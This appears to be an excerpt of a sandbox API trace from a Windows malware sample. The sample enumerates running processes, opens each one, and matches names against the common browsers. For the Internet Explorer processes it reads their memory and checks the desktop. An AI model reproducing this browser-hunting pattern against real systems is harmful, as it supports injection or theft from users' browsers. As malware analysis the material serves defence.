	[0215.426] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.426] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0215.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.427] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.427] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0215.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4514
	[0215.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.428] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0215.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.428] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.429] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0215.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.429] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.429] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0215.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4518
	[0215.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.430] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0215.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.430] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.431] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0215.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.431] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.431] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0215.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x451c
	[0215.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.432] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0215.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.433] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.433] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0215.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.433] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0215.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4520
	[0215.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.435] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0215.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.435] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.436] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0215.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.436] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0215.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4524
	[0215.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.438] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0215.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.438] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.438] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0215.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.438] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.438] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0215.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4528
	[0215.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.439] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0215.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.440] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.440] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0215.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.441] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.441] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0215.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x452c
	[0215.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.442] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0215.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.443] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.443] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0215.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.444] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.444] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0215.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4530
	[0215.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.445] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0215.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.445] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.445] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0215.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.446] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.446] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0215.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4534
	[0215.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.446] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0215.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.447] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.447] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0215.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.447] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0215.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4538
	[0215.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.448] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0215.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.449] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.449] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0215.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.450] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.450] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0215.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x453c
	[0215.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.451] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0215.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.488] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0215.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.489] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.489] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0215.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4540
	[0215.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.490] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0215.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.491] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.491] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0215.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.492] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0215.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4544
	[0215.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.493] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0215.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.494] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.494] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0215.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.495] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.496] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0215.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4548
	[0215.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.496] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0215.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.497] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.497] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0215.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.498] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x454c
	[0215.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.499] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.500] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.500] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.500] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.500] NtQueryInformationProcess (in: ProcessHandle=0x454c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.501] ReadProcessMemory (in: hProcess=0x454c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0215.501] ReadProcessMemory (in: hProcess=0x454c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0215.501] ReadProcessMemory (in: hProcess=0x454c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0215.501] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4550
	[0215.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.502] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.502] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.503] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.503] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.503] NtQueryInformationProcess (in: ProcessHandle=0x4550, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.503] ReadProcessMemory (in: hProcess=0x4550, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0215.503] ReadProcessMemory (in: hProcess=0x4550, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0215.503] ReadProcessMemory (in: hProcess=0x4550, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0215.503] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4554
	[0215.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0215.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4558
	[0215.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.507] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0215.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.507] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.507] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0215.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.508] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.508] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x455c
	[0215.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.509] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.509] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.510] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.510] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4560
	[0215.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.512] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.512] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.512] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.513] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0215.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4564
	[0215.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.514] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.514] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.514] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.515] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4568
	[0215.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.516] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.517] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.517] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.517] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
